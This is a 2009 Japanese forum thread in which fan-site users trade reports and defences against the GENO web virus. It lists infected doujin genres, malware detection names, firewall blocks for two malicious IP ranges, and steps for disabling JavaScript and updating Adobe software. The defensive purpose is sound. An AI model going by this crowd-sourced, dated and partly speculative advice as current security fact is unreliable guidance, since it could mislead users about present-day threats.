01.ヘタリア (PC鯖使用の携帯向け同盟)/ 02.おお振り(アンソロ告知サイト) 03.福本:越境,銀金

■ゲーム【RPG,ACT】
01.幻想水滸伝 / 02.戦国BASARA(アンソロ告知サイト) / 03.戦国無双 / 04.バイオハザード
05.メガテン:真、サマナー、ライドウ、ペルソナ4 / 06,テイルズオブジアビス / 07,セブンスドラゴン
■ゲーム【乙女ゲーム,BLゲーム,男性向け】
01.Vitamin / 02.遙かなる時空の中で / 03.Starry☆Sky / 04.クインロゼ / 05.薄桜鬼
01.ニトロプラスキラル:咎狗(アンソロ告知サイト)
01.Fate / 02.ひぐらし
■ゲーム【格闘,アーケード,その他】
01.ポップンミュージック / 02. 東方 (超大手感染情報) / 03ブレイブルー

■小説・ライトノベル - 01.小野不由美(サーチ)
■創作 - 01.創作小説 / 02.創作同人ゲーム /03.オリJUNE
■その他 - 01.特撮

■その他の接触確率の高そうな報告例
01.非同人系ゲーム同盟サイト / 02.模型イベントホビーコンプレックス告知サイト

263 :GENO:2009/05/16(土) 14:33:40 ID:b/+eltGS0
そういえば特撮系同人サイトは前スレでも報告されてなかったけ?

264 :GENO:2009/05/16(土) 14:34:11 ID:LZxxGYzu0
>>258

誤解されてる方がいらっしゃるようですが今回のウイルスはFlashとPDFの脆弱性をついたものですので
ブラウザは関係ありません。IEを責めないであげてください。

265 :GENO:2009/05/16(土) 14:34:33 ID:c6aZl6Ug0
>>247
残念ながらぐぐって行けるところという情報しか妹からは聞き出せなかった
履歴ももう削除してしまったし
同人関係ないのはごめん、でももしGENOウイルスだったら就活中の人も相当ヤバイ

266 :GENO:2009/05/16(土) 14:34:40 ID:wC2VoGPT0
Firefoxのアドオンの中にはボタン一つでJSをON/OFF出来るのもある
参考までに
ttps://addons.mozilla.org/ja/firefox/addon/1237

267 :GENO:2009/05/16(土) 14:35:37 ID:NddsKjpSO
>>1
スレ立て乙でした、認識不足で申し訳なかったです。
テンプレはり師さん、乙でした。

ついでGENO本スレ
感染疑いあり※
コナンノマカプ同人サイト

268 :GENO:2009/05/16(土) 14:36:31 ID:TrcSX6JmO
新型インフルエンザに新型コンピューターウィルス
逃げ場がないな

火狐設定変えてこようorz

269 :GENO:2009/05/16(土) 14:36:32 ID:uACsvbNb0
>>252
他の対策もした上でjavascriptオフにしとけばアウトでは無いと思う
とは言え火狐の方がユーザー多いから、
安心感得たいならそっちに従った方が気分は楽かも

自分はOperaで必要な時だけ、F12からjavascriptオンに切り替えてる

270 :geno:2009/05/16(土) 14:36:38 ID:gn9vKAuV0
やれる事はやってみるよ素早いレスありがとう

>>207
亜種が色々あるのを知ったのはチェック後だったから
詳細控えてないのですすみません。ウイルス自体はトロイ。

271 :げの:2009/05/16(土) 14:37:09 ID:eBDfFPMrO
>>260
検知してくれて感染まぬがれてる身だが、亜種どんどん出てるし完全に対応
間に合うとは限らないので油断禁物

しばらくJAVA切って引きこもって、携帯で閲覧するわ

272 :GENO:2009/05/16(土) 14:37:18 ID:EM/BIfU/0
>>260
牛スレの方でバイク乗りか船体なのか他なのかもう少し詳しい情報プリーズ

273 :geno:2009/05/16(土) 14:37:19 ID:zjz25qsH0
>>264
じゃあなぜまとめサイトには
>●ブラウザはIE以外のものを使用し、
という記述があるの

274 :GENO:2009/05/16(土) 14:38:55 ID:TE1oPb0X0
Adobe関係の最新バージョンと確認方法
一応最新バージョンの数字再確認してきたけどこれで合ってるかな

Adobe Flash Player のバージョン確認
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
※JavaScript有効じゃないといけないので確認時のみ有効にしておく事
現在の最新バージョン 10,0,22,87

AdobeReaderのバージョン確認
スタート→すべてのプログラム→Adobe Reader起動後、
ヘルプ→Adobe Readerについてをクリック
現在の最新バージョン 9.1.1

275 :げの:2009/05/16(土) 14:39:28 ID:vuZ+sjZWO
>>262
()でくくるとそのサイトだけが感染してるみたいだから止めた方がよくない?
ヘタリア、おお振り、BASASAは普通の同人サイトでも感染あるし

276 :GENO:2009/05/16(土) 14:39:29 ID:UdYRnt/i0
自己申告。
特撮・平成バイク乗りで5月頭に感染しました。対処済み。

277 :GENO:2009/05/16(土) 14:40:25 ID:327uCyHU0
>>251
ググレカスが命取りになりかねないからな

278 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:40:58 ID:EKPYjVdC0
>>265
それ系の普段誰が見るんだ系サイト(しかも皆デザインが似てる)が感染してた例があるよ。
実際に踏んだ。2つの会社に(あえて晒すけどロリポップとvalue domain)に連絡したけど
返信してくれたのはロリポップのみで、しかも訪問者には特に告知なし。
黙って修正しただけで終わっちゃった。
たぶん同一人物が管理してるんじゃないかなんてセキュ板の人が言ってたけど
俺もそう思う。他にも気付いてないサイトが一杯あるはずだよ。たぶんその一つだったんじゃないかな。

279 :GENO:2009/05/16(土) 14:41:29 ID:5AlQPwu90
次回から>>1にテンプレで入れたらどうかな
スレで質問する前にログくらい読みましょう、とか、
解らないことがあったらまずwikiのFAQを読みましょう、とか

いちいち書かないと行けないのも馬鹿馬鹿しいが
同じ質問ばかり繰り返されて、感染報告や新規情報が埋もれてまとめの人も大変だろうに

280 :GENO:2009/05/16(土) 14:41:31 ID:/o8T8pPE0
サイトを持っているので、不安になり>>10の方法でやったけど大丈夫でした。
自サイトにも変な文字列は入っていませんでした。
その後pdfリーダーとflashを最新にし、カスぺのオンラインスキャナを試した所、
Exploit.Win32.Pidief.atmっていうのが引っ掛かりました。
これもアウトでしょうか。別のウイルスに掛かっているという事でしょうか。


281 :geno:2009/05/16(土) 14:41:53 ID:5qGyw+II0
>>253
無事じゃなかったら今頃祭りだろうな

282 :GENO:2009/05/16(土) 14:42:41 ID:AJDusmZN0
>>273
Wiki管理人がMSアンチなんだろw
セキュ板のテンプレにはIE云々なんてないぞw
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

283 :geno:2009/05/16(土) 14:43:21 ID:+bxNWFSA0
>>275
サーチや企画サイトは影響力が個人サイトに比べて半端ないから、区分は必要かと

然しこういうときにこの板の連投規制は辛いな

>>253
ニコは動画紹介の個人サイトがアウトだったな

284 :GENO:2009/05/16(土) 14:44:38 ID:Gh3ZB53n0
>>275
()内は閲覧者の多いサーチや情報サイト系の被害が爆発的に広まりそうなものだけにした



285 :GENO:2009/05/16(土) 14:45:07 ID:qVxtVMze0
>>280
外出

アウトです。

286 :GENO:2009/05/16(土) 14:45:14 ID:Kjda8wrMO
FTPで書き換えが起こるんなら鯖のファイルマネージャー使ってる人は
サイトの書き換えは起こらないってことか?

287 :同人:2009/05/16(土) 14:45:51 ID:NddsKjpSO
>>282
IEのみ感染報告があり、火狐など他のブラウザーでは報告がないからなのかな
IEのみ感染するウィルスかもしれないが確定してないんジャマイカ
と言ってみるテスト

288 :GENO:2009/05/16(土) 14:47:15 ID:wC2VoGPT0
>>286
ブログでの感染例が本当ならIDやパスが漏れた時点で
ファイルマネージャー利用するIDやパスが漏れるので改竄されると思う

289 :GENO:2009/05/16(土) 14:48:34 ID:x7enN2xd0
IEが禁止の理由(推測)
・JS禁止方法がわかりにくい(セキュリティの高低じゃわからんわ)
・感染後、実際ウィルス働くのが窓使いでIE7まで使用の場合の可能性濃厚(8は対策済らしい)
・ていうかどっちにしろIEは狙われやすいから、やめとくに越したことはない

ただもちろん亜種なんかには対応しきれないだろうね。

290 :GENO:2009/05/16(土) 14:50:19 ID:GfLVqANbO
IEの最大の特徴は
・Windowsにデフォルトでついてくるのでそのまま使う人が多い
・IEにしか対応してない企業サイトが多いため、なんだかんだで使う
・アップデートするにはWindowsUpdateが必要
(他ブラウザはネット繋いでれば勝手に更新告知→アップデートしたらブラウザ再起動で完了だが、
IEは他のパッチと同時配信の上にPC再起動させないといけないので面倒)

それにシェアが落ちたとはいえIEは未だに最大を誇ってるし、シェアが高いということは
一回の攻撃で被害の範囲がでかくなるということ
だからMicrosoft製品やそれに準じた製品への攻撃が多いのが実情
企業サイトにはPDFファイルやFLASHが多いし

291 :GENO:2009/05/16(土) 14:51:23 ID:uNwCOKVY0
ノートンのFWでIP遮断したいのですが、
CIDRが有効か分からないので範囲指定で直接入力しようとしています。

94.247.0.0/16=94.247.0.0〜94.247.255.255
94.229.65.160/27=94.229.65.160〜94.229.65.191

で合ってますか?
上は前スレから、下は自分で計算しました。

292 :Geno:2009/05/16(土) 14:51:29 ID:HJwFPOpeO
Safariって大丈夫かな?

293 :GENO:2009/05/16(土) 14:52:34 ID:cTk5UUKP0
すみません、お伺いします。
ニフのオンラインスキャンをかけたところExploit.JS.Agent.agrというのが
ひっかかったんですが、これはアウトでしょうか?
一応>>10の方法はひっかからなかったんですけど。

294 :2:2009/05/16(土) 14:53:45 ID:n/uQJHr/0
>>282
すまん、Wikiはほとんどが前スレに書かれてたもののコピペなので
嘘や矛盾があったらガンガン指摘してくれると助かる
正直本スレ追ってる余裕がない

293まで反映済み・漏れがあったら指摘プリーズ

295 :GENO:2009/05/16(土) 14:55:13 ID:9ESkYQMb0
>282
カスペルスキーインターネットセキュリティ 2009
定義データベース 5/16 0:02更新分

Adobe Acrobat Reader 9.1.1 EScript.apiとEScript.JPNに脆弱性ありとして
隔離推奨表示が出るようになったので報告

296 :GENO:2009/05/16(土) 14:59:05 ID:sxvO2gMk0
もうこえーからadobeごと削除した
それでもまだ不安だしPCもセトアプし直そうかと思う・・

297 :GENO:2009/05/16(土) 14:59:56 ID:5dy38PGO0
>>293

>>280
ログくらい読んでくれ

298 :Geno:2009/05/16(土) 15:01:03 ID:9ESkYQMb0
>292
Windows版Safariのこと?
 ・5/14に脆弱性対処最新バージョン3.2.3がリリースされた

対処法としては
 ・設定→セキュリティ
   詐欺サイト:詐欺Webサイトを訪問したときに警告
   Webコンテンツ: プラグイン/JavaScriptを有効にするをオフ
 ・詳細→メニューバーに【開発】メニューを表示
 ・ツールバー(Macならメニューバー)→開発
  JavaScriptを無効にする
  サイト固有のハックを無効にする
  Runaway JavaScriptを無効にする

299 :GENO:2009/05/16(土) 15:01:33 ID:oZDqcfM00
javascriptってIEだと
インターネットオプション→詳細設定のjava(sun)のチェックを消せばいいんでしょうか?

300 :GENO:2009/05/16(土) 15:02:17 ID:YM6POmPN0
>>287v
どのスレで見たのかログ探しきれなかったんだけど、解析してた人の報告では
このウイルスは感染者のOSがXPかVistaか、ブラウザはIEかってのをちゃんとチェックしてるらしい
IEだけが感染するという確定はしていなかったけど

301 :GENO:2009/05/16(土) 15:02:31 ID:ztB8Zhmo0
報告済みのジャンルだけど、Avastが止めてくれたサイトには
携帯(場合によってはファイルシーク併用)で連絡してきた。
フルブラウザじゃなければ大丈夫だよね?

FTPパスの件だけど、クリーンインスコに時間がかかるときに
ウイルスソフト最新起動&JavaScript切った火狐がいけるクリーンな他のパソコンで
ひとまず外部からパスだけ変えておくのはアリなんだろうか?
外部からのhtml書き換えを阻止するという意味で

302 :GENO:2009/05/16(土) 15:03:06 ID:EM/BIfU/0
>>299
違う
JavaとJavascriptはまったくの別物

303 :げの:2009/05/16(土) 15:04:33 ID:Mj+7pFfsO

まとめみたり携帯で調べない奴はPC捨てろ


304 :GENO:2009/05/16(土) 15:04:44 ID:ahOFyb1R0
他スレから拾ってきた
Adobe FlashPlayer バージョンテスト
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm


305 :GENO:2009/05/16(土) 15:07:24 ID:Q7dpgxZp0
今同人サイトまわってたらトロイの木馬って
反応したサイトあったけどこれは違うのかな?

306 :GENO:2009/05/16(土) 15:08:56 ID:lapl18Rv0
>300
たぶんこれ?

――――――
76 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/16(土) 13:53:19
IE以外で感染した人っているの?
スクリプトを見る限り、IE決め打ちでNT Versionも6未満をターゲットに
してるようなんだけど。

307 :ウイルス:2009/05/16(土) 15:09:07 ID:+10WbMtBO
み糞とかでも注意換気した方がいいかな?

308 :GENO:2009/05/16(土) 15:11:19 ID:BpSFSHPIO
>>307
したほうがいいね

自分も今日の日記に書くわ

309 :GENO:2009/05/16(土) 15:11:24 ID:ztB8Zhmo0
>>305
Avastではトロイ扱いで検出される。
なので詳細を知らせてほしいのと、
どっちみち何かに感染してる可能性があるからそこの管理人にも知らせとけ

310 :Geno:2009/05/16(土) 15:11:51 ID:lSs1Y9z/0
>304
一番簡単なバージョン確認方法
 C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
 プロパティ→ファイルバージョン:10.0.22.87かどうかを確認

311 :GENO:2009/05/16(土) 15:12:30 ID:+iGeOjmv0
レジストリエディタが立ち上がればセフセフ?

312 :GENO:2009/05/16(土) 15:12:31 ID:zlsW0HIw0
>>289
Firefoxが会わないという人もいるから、
そういう人はIE系のタブブラウザでページごとに
JavaScriptオン/オフ出来るものを使うといい
FirefoxでNoScript突っ込んでabout:config変更がいちばん簡単だとは思うけど
使い慣れてない人にとってはストレスかもしれない

>>301
感染したPCをネットワークから切り離して、
安全と確認したPCからならいいけど、
焦って接続するよりクリーンインストールしてからパスワード変更した方がいいと思われ

>>299
まとめサイトのFAQは見れ

頼むからJavaとJavaScriptの区別くらいつけてくれ。サイト持ちなんだろう


313 :GENO:2009/05/16(土) 15:13:22 ID:2l2WFVGe0
6未満ならVistaはセーフのはずだけど感染報告あるんだよね?
未満と以下を勘違いしてるとかかな

314 :GENO:2009/05/16(土) 15:14:31 ID:UzmDldtu0
まとめwikiに
>InternetExplorerの場合、ある状況によっては画像ファイルからも感染するおそれがあるが、IE8では対策済み。
って書いてあるけど、IE8ならGENOウイルス自体には感染しないって意味?
それとも「画像ファイルから感染する恐れがない」ってだけ?

315 :GENO:2009/05/16(土) 15:14:42 ID:i6/Zrtyj0
>>313
300 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 15:11:39
Vista/7はUAC有効のままなら大丈夫
心配性の人は、この機会にDEPを全てのプログラムに対し有効にしておけ
例外設定が面倒だが、下手なアンチウイルスよりよほど信頼できる

だそうです

316 :GENO:2009/05/16(土) 15:14:51 ID:oZDqcfM00
>>312
すみません、サイトは持ってないんです。どうも、まとめ見ても無効にする方法が分からなくて……。
他の方々にも御迷惑をお掛けしました

317 :GENO:2009/05/16(土) 15:14:55 ID:uHPzWLxWO
>>311

まとめ嫁

318 :wikiへ意見:2009/05/16(土) 15:15:08 ID:ZY63nfuoO
IE7以前だと
今回のウイルスで感染したサイトに勝手にアップされた悪意のある画像ファイルも
読み込んでしまうことがある
(IE8ではその点に関しては対策済み)

今回の場合においてIE以外のブラウザを推奨するのは
そういう理由もあるからだと理解してます。

だから一概にアンチMS、あるいはアンチfirefoxと
ひとくくりにせず、自ら判断する姿勢が要ると思う。
閲覧するほうも編集するほうもね。

319 :前スレ695:2009/05/16(土) 15:15:17 ID:lVU/fMVd0
ニフティでスキャンしたら、WINDOWSフォルダ直下のpnftca.jefってやつにTrojan.Win32.Small.bxzってのを発見。
とりあえずこのpnftca.jefファイルの更新日がsqlsodbc.chmの更新日が一致した。
さーて、美容院の予約取り消して対処してくるか。λ..........

320 :GENO:2009/05/16(土) 15:16:16 ID:ouP87PZj0
>>291の質問に答えてほしいage

321 :GENO:2009/05/16(土) 15:16:36 ID:uACsvbNb0
>>314
その書き方だと後者じゃないかと思う

322 :GENO:2009/05/16(土) 15:17:44 ID:uHPzWLxWO
>>320

ノートンスレ池

323 :GENO:2009/05/16(土) 15:18:07 ID:YM6POmPN0
>>306
もう少し以前にスクリプトの1部抜粋で詳しく書いてあったような気がする
亜種ではそのOS、ブラウザのチェック部分が無いタイプもあるから注意しろとか
あちこちスレ回りすぎてどの板で見たのかわかんなくなってきた

324 :GENO:2009/05/16(土) 15:18:20 ID:QEfuRwLG0
Vista(IE7)でのJS無効のやり方を詳細に教えてほしい
ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
…まで行ってみたんだが、JSを無効に〜みたいなのが見つからない
どれですか?

325 :GENO:2009/05/16(土) 15:19:21 ID:XwE+Ekmp0
GENOウイルスまた流行りだしたのか?
とっくに終息したもんだと思ってたわ。
マジ危険なやつだから注意。

326 :GENO:2009/05/16(土) 15:19:35 ID:UzmDldtu0
>>321
そっか、ありがとう
自分はIE8使ってるけどコマンドプロンプトもレジストリエディタもちゃんと起動できるし
今のところは感染してないな
Adobe ReaderもFlashも最新バージョンだし

327 :GENO:2009/05/16(土) 15:20:33 ID:cN6MMg830
>>316
ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ→
スクリプトのとこ全部無効にチェック

違うとは書いてあるけど、やりかた記載してるレスは無いんだな
これもwiki載っけたほうがいいと思う

328 :GENO:2009/05/16(土) 15:20:44 ID:ZsFoOwaV0
>>319
鯖上のファイル全部消してケーブルとか物理的に引っこ抜いて美容院行ってくればいいじゃない

329 :GENO:2009/05/16(土) 15:20:47 ID:/m6gQ1ZiP
>>325
だから今の方が危険だわ

330 :geno:2009/05/16(土) 15:21:09 ID:5qGyw+II0
>>325
ここ数日でパンデミックに発展

331 :GENO:2009/05/16(土) 15:21:16 ID:5YFx+VE/0
>コマンドプロンプトもレジストリエディタもちゃんと起動できるし
これ出来ても意味がないんじゃなかったか?
上でそれでも感染報告出てるけど

332 :GENO:2009/05/16(土) 15:21:29 ID:Q7dpgxZp0
>>309
検出名:Obfuscated Script.f(トロイの木馬)
ちなみにソフトはMcAfee


サイト踏んだ後>>1のウィルス感染の確認をしたが大丈夫だった
管理人には一応知らせておく
昨日まで反応しなかったサイトなんだよな…

333 :GENO:2009/05/16(土) 15:21:33 ID:pVF4Vxv+0
まとめだと
>JavaScriptの無効化方法
>ツール→オプションからJavaScriptを無効にできる。IEの場合はブラウザ再起動をしないと適用されないので注意
とあるけど、細かく書くとこうなるのかな…?

ツール
→インターネットオプション
→セキュリティタブにあるレベルのカスタマイズをクリック
→「スクリプト」のアクティブスクリプトを「無効」


334 :GENO:2009/05/16(土) 15:22:51 ID:7vPPIstBO
Opera使いだが、Operaはツール→クィック設定でjavascript簡単に切れるよ、と報告
今のとこ未感染。
IEからの乗り換え考えてる人にどうぞ。

利便性も今のところ不自由は感じない。

335 :GENO:2009/05/16(土) 15:23:39 ID:ejT6I8UcO
>>322
ノートン使いじゃないけど>>291は気になる
ノートンでの設定の仕方とかじゃなくて、あの範囲指定で
合ってるのかどうか知りたいんだが

336 :GENO:2009/05/16(土) 15:23:57 ID:pVF4Vxv+0
おお、>>327とかぶった
というか微妙に違った
そうだな、全部無効にしとけばいいのか

337 :GENO:2009/05/16(土) 15:25:13 ID:19cWedGn0
他の板見ても全く認知されてない感じなんだが
どれだけの人がこことか本スレ見てるのかな(分かるわけはないんだけど)
スレの伸びとか妙に速いし祭りレベルだと勝手に思ってたんだけど

338 :GENO:2009/05/16(土) 15:26:39 ID:/m6gQ1ZiP
深刻に思ってないのが多いだけだな
後の祭りになりそうだ

339 :GENO:2009/05/16(土) 15:26:41 ID:5dy38PGO0
>>337
自分は大丈夫と考えている人は意外に多い
豚フルと同じ。過剰なくらいの対策をしてまずいということはないんだがなぁ

340 :324:2009/05/16(土) 15:27:46 ID:QEfuRwLG0
スクリプトのところに
・JAVAアプレットのスクリプト
・アクティブスクリプト
とあるんだが、アクティブ〜のトコだけ無効でおk?
JAVAは別物の方?有効で大丈夫かな?

341 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 15:28:06 ID:NCQvc8VZ0
ニフティのオンラインスキャン、30分で6%しか進んでいないのは何かの嫌がらせですか?

342 :GENO:2009/05/16(土) 15:28:16 ID:Sb/N6fL20
火狐、使いにくくはないけどインターフェースがIEと違うくて慣れない人は
テーマのアドオンのLooks familiarってのにするとまんまIEっぽくなって
気分的に使いやすいよ。
あと、アドレスバーはツール→ツールバー→カスタマイズ→ツールバーの追加で
一段下に増えるので、そこに今あるアドレスバーをドラックすればIEっぽくなる。
火狐はIEよりカスタマイズの範囲が広いので、弄って自分好みに出来るのがいい。

そこにNoScriptを追加して、>>9でググルの先読み禁止してAdobeのフラッシュと
Reader最新にして、サイト巡りちょっと控えてみる。

343 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 15:28:18 ID:WBK+n/yh0
fc2のブログで見つかったとか見つからないとかの話題が出てたけど、
以前ロリポでも「勝手にソースが書き換えられるようです」系の警告文流さなかったっけ?
あれはGENO関係だったのかな…
自サイトはなんともなかったので詳細はあんまり覚えてないんだけど

カスペでスキャンしようと思ってボタン押したのにまったく起動しなかった
重たいだけだよな…

344 :GENO:2009/05/16(土) 15:28:45 ID:wQTybYbw0
>>337
自分は自ジャンルスレでみるまでこのウィルスの存在すら
知らんかった。気づいてない人がまだまだ多数なんだろう
山田とかと違って見ただけで感染の可能性があるから
どこにでも危険があるのが怖い所だな

345 :GENO:2009/05/16(土) 15:28:46 ID:zlsW0HIw0
>>337
同人はブログじゃなくてサイト持ちが多いから影響が尋常じゃない
今はテキストベースだとブログでやってる人の方が多いけど同人サイトはそうじゃないから

346 :GENO:2009/05/16(土) 15:28:47 ID:uHPzWLxWO
トレンドマイクロのウエブの脅威度低いな
っつか最新更新が4日…

347 :GENO:2009/05/16(土) 15:29:15 ID:r5vGNU7N0
MacとiPod Touchはどうすればいいですか?

348 :GENO:2009/05/16(土) 15:29:31 ID:A9qSW+uH0
>>333
それJAVAアプレットのON/OFFじゃない?

IE8のJSオフにするのどこだっけな、、

349 :GENO:2009/05/16(土) 15:29:31 ID:58PrCe2G0
感染してからじゃ遅いもんな
さっき家族にも言ってきたところだ
幸い何事もなかったけど、怖いから当分ネットしないと言ってた

mixiとか手ブロ、ピクシブあたりは少しずつ注意がいってるらしいけど
あと出したらよさそうなところってどこがあるだろう
動画サイトとかは無理なのか
しかし下手に動くと自分も危くなるし。難しいな

350 :GENO:2009/05/16(土) 15:29:36 ID:oRZKM7s90
現時点でも感染拡大中なのにな。
ただ呼びかけようにもサイトにお邪魔するのもためらうしな。
たぶん初心者や厨房や消防とかここに関心のない連中は見てないかもしれない。

351 :GENO:2009/05/16(土) 15:29:46 ID:KK8iCgsD0
ノートン先生入れたままカスペルスキーでスキャンできる?

352 :GENO:2009/05/16(土) 15:30:12 ID:gBY6y8oV0
これってウイスルバスターを入れてても感染するんだよね?
ウイルスバスターの対応はまだなのか

353 :GENO:2009/05/16(土) 15:30:30 ID:lSs1Y9z/0
まだウイルス・スパイウェア対策ソフトを入れてない人はこの際
KIS2009体験版を入れてみてはどうかと思う次第。

354 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 15:30:54 ID:Snqsetvv0
今落ちてくるやつはcmdは普通に起動できる
regeditは感染直後は起動できたけど一度再起動したらregedit起動できなくなった

355 :GENO:2009/05/16(土) 15:31:51 ID:lSs1Y9z/0
>347
新Mac板のセキュリティスレへ池
同人系の相談がしにくければノウハウ板のMacユーザースレへ

356 :GENO:2009/05/16(土) 15:32:11 ID:aftcTZja0
前スレまでは入ってたけど、
閲覧しただけで感染する
その状態でFTP使って更新すると・・・みたいなことが書いてないから
どういう仕組みで感染するのか分かってない人が多いんじゃないか?

357 :GENO:2009/05/16(土) 15:32:23 ID:/m6gQ1ZiP
基本バスターは対応遅いでしょうから他ので対策出来たらそっちに行った方が早い
けど今回はその対策がいつになったら出来るかっていう感じだが

358 :GENO:2009/05/16(土) 15:33:05 ID:ahOFyb1R0
ピクシブは注意画像できてた
が、即効埋もれてた

359 :Geno:2009/05/16(土) 15:33:40 ID:r5vGNU7N0
>>355
ありがとう行ってきます!

360 :GENO:2009/05/16(土) 15:34:30 ID:YXeXSazI0

>>333
ありがとう。
IE7でJavaScriptの無効化方法わからなかったので、すごい助かった!

361 :GENO:2009/05/16(土) 15:35:05 ID:OBv5ObJO0
もうでてるサイトかもしれんが戦国BASARAで感染確認
忍者が多い・メインがコミックなサイトさん
2・3日前にメルフォから連絡したが反応なし・対応もなし
JS:Redirector-H7 [Trj]ってトロイが確認されてます

362 :GENO:2009/05/16(土) 15:35:10 ID:zClCL8ZG0
>>348
IE8もインタねーっとオプション→セキュリティだと思うんだけど
自分もいまいち分からないから、セキュリティのレベルを
中高から高に上げてみた。そしたらjs切れたよ

363 :GENO:2009/05/16(土) 15:37:05 ID:19cWedGn0
>>338
その頃になって報道するんだろうな
>>339
>>344
>>345
やっぱ全く気づいてない人多いんだろうね
今日は早速友達に伝えたよ
少しでも気をつける人が増えればいいな

364 :GENO:2009/05/16(土) 15:39:14 ID:A9qSW+uH0
pixivで注意喚起した人、企画目録タグつけて
キャプションに「注意喚起のイメレスイラスト募集」みたいなの
書き加えてみたらどうだろう

目録タグは結構見てる人多いし、長い間残るし
イメレスついてりゃ人も注目する

365 :GENO:2009/05/16(土) 15:40:38 ID:BpSFSHPIO
早くウイルス作者タイーホされないかな

366 :GENO:2009/05/16(土) 15:40:41 ID:FSJOAnxP0
これ巡回ソフト(WWWC)使うだけでも感染するの?

367 :GENO:2009/05/16(土) 15:41:32 ID:oZDqcfM00
これ↓どうすれば良い?「IP 範囲指定」でググっても、それらしきページ出てこないんだ。

FW(ファイアウォール)を有効にし、以下のIPを遮断
94.247.0.0/16
94.229.65.160/27(最新)



368 :GENO:2009/05/16(土) 15:42:12 ID:58PrCe2G0
携帯でいくつか自ジャンルや周辺見たけど
注意喚起してるところまだ少なすぎる
4月下旬〜5月頭(GW終了間際くらい)にFTPのパスが割られたとかいう
サイトあったがそれもこの影響なのか…

ピクシブとか手ブロとかで注意喚起あるようだけど
埋もれちゃうなら何とかしないとなあ
メッセ立ち上げ→名前のとこにウイルス蔓延中注意!とか出してもだめかな

369 :GENO:2009/05/16(土) 15:42:43 ID:sAiJqBv30
今日はやけに人家の窓の下にPCの残骸があると思ったら…

370 :GENO:2009/05/16(土) 15:43:02 ID:uACsvbNb0
>>364
感染被害拡大中のジャンルなり、萌え絵なりでイメレスつけば
文字だけだとスルーする人も見るだろうしいいかも
ブクマ→ブクマの口コミじゃ限度あるし

371 :GENO:2009/05/16(土) 15:43:17 ID:2fa0qj3z0
よくインターネットする親父にウィルスの事注意したら
別に感染してもかまわんみたいな事言われた…
こういう奴もいるんだな…

372 :GENO:2009/05/16(土) 15:43:28 ID:p/yqpyhY0
思い切ってAdobe Readerはアンインストールしたのですが
IEのJava Scriptも切った方がいいんですかね?
これまでOFFにしてしまうとサイトの閲覧に支障がでるんですが

373 :GENO:2009/05/16(土) 15:44:23 ID:+qVHux6TO
>>291
範囲指定それであってるよ

CIDR表記に対応してないファイアウォールあるし、わからない人も多いだろうからまとめサイトにも書いといた方がいいと思う

374 :GENO:2009/05/16(土) 15:44:25 ID:Gh3ZB53n0
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなどの閲覧者多数による被害拡大が予測される場合、特に()内に記載。

■アニメ系
01エヴァ(小説サーチ) / 02忍たま乱太郎 / 03ガンダム00 / 04プリキュア / 05天体戦士サンレッド 06コードギアス / 07レッツ&ゴー / 09イナズマイレブン

■少年漫画【週刊飛翔系】
01リボーン(プチオンリー告知サイト・ファンサイト) / 02テニミュ(ファンサイト) / 03ジョジョの奇妙な冒険 / 04ワンピース /
05デスノート / 06D.Gray-man / 07遊戯王無印
■少年漫画【その他】
01鋼の錬金術師(オンリー告知サイト) / 02コナン
■青年漫画
01ヘタリア (PC鯖使用の携帯向け同盟)/ 02おお振り(アンソロ告知サイト) 03福本:越境、銀金

■ゲーム【RPG、ACT】
01幻想水滸伝 / 02戦国BASARA(アンソロ告知サイト) / 03戦国無双 / 04バイオハザード
05メガテン:真、サマナー、ライドウ、P4 / 06、テイルズオブ:ジアビス / 07セブンスドラゴン
■ゲーム【乙女、BL、男性向け】
01Vitamin / 02遙かなる時空の中で / 03Starry☆Sky / 04クインロゼ / 05薄桜鬼
01ニトロプラスキラル:咎狗(アンソロ告知サイト)
01Fate / 02ひぐらし
■ゲーム【格闘,アーケード,その他】
01ポップンミュージック / 02東方 (超大手感染情報) / 03ブレイブルー

■小説・ライトノベル - 01小野不由美(サーチ)
■創作 - 01創作小説 / 02創作同人ゲーム /03オリJUNE
■その他 - 01特撮:電凹

■その他の接触確率の高そうな報告例
01非同人系ゲーム同盟サイト / 02模型イベントホビーコンプレックス告知サイト

375 :GENO:2009/05/16(土) 15:45:35 ID:+iGeOjmv0
まとめ読んだ
windows updateカスタムインスコができないっス
アウアウ?
他の対策は全部やったお

376 :GENO:2009/05/16(土) 15:46:01 ID:JLSn9lA+0
だから伏せ字以下略
あーでもジャンル的に微妙な感じか?

377 :GENO:2009/05/16(土) 15:46:19 ID:G0T3OB0I0
まとめ読んだけど、oebitみたいなレンタル絵板は感染報告は無いんだね
レンタル元が感染することは無い……と思いたいけど一応チェックしてる

378 :GENO:2009/05/16(土) 15:49:06 ID:V9V0BvaO0
女性向けはヲチが活発で足をひっぱりあうジャンルもあるから
啓蒙しずらいんじゃないか
真面目に注意喚起した人を、情報が早い人はねらーw呼ばわりする
馬鹿ヲチャがいる。
連中さえいなければもっと早く情報伝達して被害が防げるかもしれないのに。

